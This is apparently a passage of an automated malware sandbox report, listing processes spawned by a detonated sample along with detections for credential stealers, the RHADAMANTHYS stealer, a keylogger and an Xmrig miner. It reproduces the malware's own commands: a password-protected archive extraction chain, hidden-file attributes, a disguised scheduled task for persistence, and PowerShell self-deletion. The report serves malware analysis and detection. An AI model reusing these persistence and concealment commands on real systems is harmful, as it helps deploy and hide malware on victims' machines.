                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:05:09:15
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe"
                                                                                                                                                                  Imagebase:0xd90000
                                                                                                                                                                  File size:765'568 bytes
                                                                                                                                                                  MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:05:09:19
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe"
                                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                                  File size:776'832 bytes
                                                                                                                                                                  MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:05:09:19
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:13
                                                                                                                                                                  Start time:05:09:22
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe"
                                                                                                                                                                  Imagebase:0xe50000
                                                                                                                                                                  File size:776'832 bytes
                                                                                                                                                                  MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:05:09:31
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:4'438'776 bytes
                                                                                                                                                                  MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 88%, ReversingLabs
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                  Imagebase:0x7ff6961b0000
                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:17
                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\mode.com
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:mode 65,10
                                                                                                                                                                  Imagebase:0x7ff707a30000
                                                                                                                                                                  File size:33'280 bytes
                                                                                                                                                                  MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:18
                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:19
                                                                                                                                                                  Start time:05:09:35
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:20
                                                                                                                                                                  Start time:05:09:36
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:21
                                                                                                                                                                  Start time:05:09:36
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:22
                                                                                                                                                                  Start time:05:09:37
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:23
                                                                                                                                                                  Start time:05:09:37
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:24
                                                                                                                                                                  Start time:05:09:37
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:25
                                                                                                                                                                  Start time:05:09:37
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                  File size:468'992 bytes
                                                                                                                                                                  MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:26
                                                                                                                                                                  Start time:05:09:37
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:attrib +H "in.exe"
                                                                                                                                                                  Imagebase:0x7ff73f640000
                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:27
                                                                                                                                                                  Start time:05:09:37
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"in.exe"
                                                                                                                                                                  Imagebase:0x7ff7e8040000
                                                                                                                                                                  File size:1'827'328 bytes
                                                                                                                                                                  MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:28
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                  Imagebase:0x7ff73f640000
                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:29
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                  Imagebase:0x7ff73f640000
                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:30
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:31
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                  Imagebase:0x7ff6f8550000
                                                                                                                                                                  File size:235'008 bytes
                                                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:32
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:33
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:34
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:35
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:36
                                                                                                                                                                  Start time:05:09:38
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                  Imagebase:0x7ff699180000
                                                                                                                                                                  File size:1'827'328 bytes
                                                                                                                                                                  MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:37
                                                                                                                                                                  Start time:05:09:39
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:explorer.exe
                                                                                                                                                                  Imagebase:0x7ff609140000
                                                                                                                                                                  File size:5'141'208 bytes
                                                                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.3209344034.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.3209344034.000000000120C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.3210399876.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.3209344034.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.3210301237.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:38
                                                                                                                                                                  Start time:05:09:39
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                  Imagebase:0x7ff655060000
                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:39
                                                                                                                                                                  Start time:05:09:40
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:40
                                                                                                                                                                  Start time:05:09:40
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:41
                                                                                                                                                                  Start time:05:09:40
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                  Imagebase:0x7ff655060000
                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:42
                                                                                                                                                                  Start time:05:09:48
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe"
                                                                                                                                                                  Imagebase:0xf80000
                                                                                                                                                                  File size:1'986'048 bytes
                                                                                                                                                                  MD5 hash:74C0FEC1D8D8E4C943BAED136DCF9E56
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000002A.00000003.3316994086.0000000005E30000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000002A.00000003.3314605880.0000000005700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000002A.00000003.3318224508.0000000005930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000002A.00000003.3317173955.0000000006050000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:43
                                                                                                                                                                  Start time:05:09:51
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                  File size:46'504 bytes
                                                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000002B.00000002.3336661213.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000002B.00000003.3318038166.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:46
                                                                                                                                                                  Start time:05:09:51
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 648
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:4.9%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
